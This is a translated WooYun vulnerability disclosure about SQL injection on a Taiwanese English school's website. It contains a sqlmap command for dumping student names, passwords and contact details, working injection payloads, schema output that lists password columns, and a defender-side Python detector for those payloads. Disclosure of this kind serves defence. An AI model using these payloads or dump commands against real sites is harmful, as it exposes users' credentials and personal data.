
Vulnerability Summary

Defect ID: wooyun-2015-0156612

Title: SQL injection vulnerability on the 唐威廉美語 main site (large volume of user passwords and personal data exposed) (Taiwan region)

Vendor: 唐威廉美語

Author: 路人甲

Submitted: 2015-12-01 11:25

Fixed: 2016-01-16 15:10

Published: 2016-01-16 15:10

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-01: Details sent to the vendor; awaiting vendor handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and relevant domain experts
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public

Brief description:

SQL injection vulnerability on the 唐威廉美語 main site (large volume of user passwords and personal data exposed)

Details:

URL: http://**.**.**.**/more.php?TYPE=news&PAGE=7

$ python sqlmap.py -u "http://**.**.**.**/more.php?TYPE=news&PAGE=7" -p TYPE --technique=BE --random-agent --batch  -D williamschool_www -T stud_file -C stud_Cname,stud_Pass,stud_Tele,stud_Emai,stud_Fnam --dump --start 1 --stop 20




Database: williamschool_www
Table: stud_file
[20 entries]
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
| stud_Cname | stud_Pass | stud_Tele | stud_Emai | stud_Fnam |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+

Proof of vulnerability:

---
Parameter: TYPE (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: TYPE=-2339' OR 5779=5779#&PAGE=7
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
current user: 'www@%'
current user is DBA: False
database management system users [1]:
[*] 'www'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1016 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| STATISTICS | 112 |
| PARTITIONS | 109 |
| TABLES | 109 |
| KEY_COLUMN_USAGE | 74 |
| TABLE_CONSTRAINTS | 71 |
| CHARACTER_SETS | 39 |
| PLUGINS | 23 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: williamschool_www
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| page_tags | 18370 |
| card_file | 5576 |
| photo_pictures | 3914 |
| hwor_file | 2052 |
| mp3u_file | 1897 |
| page_rssnews2 | 1749 |
| page_news | 1609 |
| page_rssnews | 1306 |
| logi_file | 1134 |
| fb_1000 | 1099 |
| page_freeco | 651 |
| fb_tests | 506 |
| page_alliance | 267 |
| stud_file | 247 |
| page_sms | 228 |
| photo_config | 204 |
| page_dynco | 190 |
| page_sms_back | 180 |
| photo_filetypes | 105 |
| photo_albums | 77 |
| page_keyword | 74 |
| page_keyword_0908 | 74 |
| photo_languages | 67 |
| fb_user | 56 |
| page_links | 30 |
| photo_categories | 28 |
| page_homco | 27 |
| teac_file | 21 |
| page_fran | 20 |
| page_fran2 | 19 |
| photo_comments | 17 |
| coun_file | 10 |
| page_topalli | 10 |
| page_topeven | 10 |
| page_topnews | 10 |
| photo_usergroups | 9 |
| photo_bridge | 7 |
| bbs_file | 5 |
| page_dynme | 5 |
| page_freeme | 5 |
| page_mail | 5 |
| page_rss | 5 |
| page_rss2 | 5 |
| page_user | 5 |
| opti_file | 3 |
| page_file | 3 |
| page_homme | 3 |
| photo_users | 2 |
| photo_votes | 2 |
| comp_config | 1 |
| page_config | 1 |
| page_frane | 1 |
| page_star | 1 |
| page_star_bak | 1 |
| photo_mod_online | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: williamschool_www
Table: photo_albums
[2 columns]
+-------------------+-------------+
| Column | Type |
+-------------------+-------------+
| alb_password | varchar(32) |
| alb_password_hint | text |
+-------------------+-------------+
Database: williamschool_www
Table: page_user
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| user_pass | varchar(20) |
+-----------+-------------+
Database: williamschool_www
Table: stud_file
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| stud_Pass | varchar(30) |
+-----------+-------------+
Database: williamschool_www
Table: teac_file
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| teac_Pass | varchar(20) |
+-----------+-------------+
Database: williamschool_www
Table: photo_users
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(40) |
+---------------+-------------+
Database: williamschool_www
Table: page_fran
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| fran_Pass | varchar(50) |
+-----------+-------------+


Database: williamschool_www
Table: stud_file
[23 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| stud_Addr | varchar(120) |
| stud_Auth | varchar(10) |
| stud_Birth | varchar(24) |
| stud_Cdate | date |
| stud_Cname | varchar(35) |
| stud_Cuse | varchar(25) |
| stud_Edate | date |
| stud_Emai | varchar(100) |
| stud_Enam | varchar(25) |
| stud_Fnam | varchar(30) |
| stud_Fran | int(3) |
| stud_Leve | int(2) |
| stud_Mdate | date |
| stud_Muse | varchar(25) |
| stud_Pass | varchar(30) |
| stud_Pem1 | varchar(100) |
| stud_Pem2 | varchar(100) |
| stud_Phon | varchar(40) |
| stud_Pnam | varchar(25) |
| stud_Prea | varchar(15) |
| stud_SN | int(11) |
| stud_Stau | varchar(1) |
| stud_Tele | varchar(40) |
+------------+--------------+

Fix recommendation:

Deploy a WAF.
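The report's remediation is a WAF. As an added defender-side example (not part of the report), the Python below scans constructed access-log lines and flags the two payload shapes sqlmap reported above: the OR tautology closed with a MySQL '#' comment, and the error-based GROUP BY CONCAT(...FLOOR(RAND(0)*2)) trick. The combined log format and the sample lines are assumptions; a rule like this is a detective control that supplements, not replaces, parameterized queries in more.php.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures distilled from the two sqlmap payloads in the report above:
# an OR tautology closed with a MySQL '#' comment, and the error-based
# GROUP BY CONCAT(...FLOOR(RAND(0)*2)) duplicate-entry trick.
SIGNATURES = {
    "boolean_or_tautology": re.compile(
        r"'\s*OR\s+(\d+)\s*=\s*\1\s*#", re.IGNORECASE),
    "mysql_error_based_floor_rand": re.compile(
        r"GROUP\s+BY\s+CONCAT\s*\(.*FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)",
        re.IGNORECASE | re.DOTALL),
}

# Request line inside a combined-format access log entry (assumed format).
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: one normal request, then the two payload shapes
# from this report, URL-encoded the way a browser or sqlmap would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2015:11:20:03 +0800] "GET /more.php?TYPE=news&PAGE=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Dec/2015:11:20:04 +0800] "GET /more.php?TYPE=-2339%27%20OR%205779%3D5779%23&PAGE=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Dec/2015:11:20:05 +0800] "GET /more.php?TYPE=-6744%27%20OR%201%20GROUP%20BY%20CONCAT(0x71707a7871,(SELECT%20(CASE%20WHEN%20(1419%3D1419)%20THEN%201%20ELSE%200%20END)),0x71766b6271,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23&PAGE=7 HTTP/1.1" 500 312',
]

def inspect_request(target):
    """Map each query parameter to the list of signatures its decoded value matches."""
    hits = {}
    # parse_qsl percent-decodes values, so the patterns see the SQL as the DBMS would.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits

def scan_log(lines):
    """Return (line_no, parameter, signatures) for every flagged request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if m:
            for param, sigs in inspect_request(m.group("target")).items():
                findings.append((n, param, sigs))
    return findings

if __name__ == "__main__":
    for n, param, sigs in scan_log(SAMPLE_LOG):
        print(f"line {n}: parameter {param!r} matched {', '.join(sigs)}")
```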

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-12-02 15:09

Vendor reply:

Thank you for the report.

Latest status:

2016-01-12: After receiving the report, HITCON emailed the service mailbox shown on the website and also telephoned the person responsible for the website to inform them of this vulnerability, but to date there has been no response.